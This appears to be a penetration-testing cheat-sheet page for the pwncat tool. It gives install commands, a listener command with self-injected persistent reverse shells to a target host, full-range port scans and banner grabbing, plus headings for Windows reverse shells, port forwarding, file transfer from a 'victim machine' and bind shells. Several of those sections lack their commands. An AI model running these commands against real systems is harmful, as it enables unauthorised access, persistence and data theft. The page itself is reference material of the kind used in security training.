githubEdit

Pwncat

Installation

1) Pip

pip install pwncat

2) Apt

sudo apt install pwncat

Usage:

1) Sets up a listener while creating a persistent mechanism. Connect back with rlwrap nc -lvnp PORT. +NUM indicates how many more ports does the persistent mechanism work

pwncat -l PORT --self-inject /bin/bash:TARGET_IP:PORT+NUM 

Test for persistence

rlwrap nc -lvnp PORT

2) Port Scan

sudo pwncat -z IP 1-65535

3) Banner grabbing

sudo pwncat -z IP 1-65535 --banner

4) UDP Scan

5) Windows reverse shell

On revshells.com, choose pwncat listener with powershell reverse shell

image

6) Local port forwarding

Install on victim machine

Run this on victim machine that has an internal port to forward

Access the web app via

7) File transfer

Receive file on our machine

On victim machine, send file to our machine

8) Bind shell

Attacker machine

Victim machine

Last updated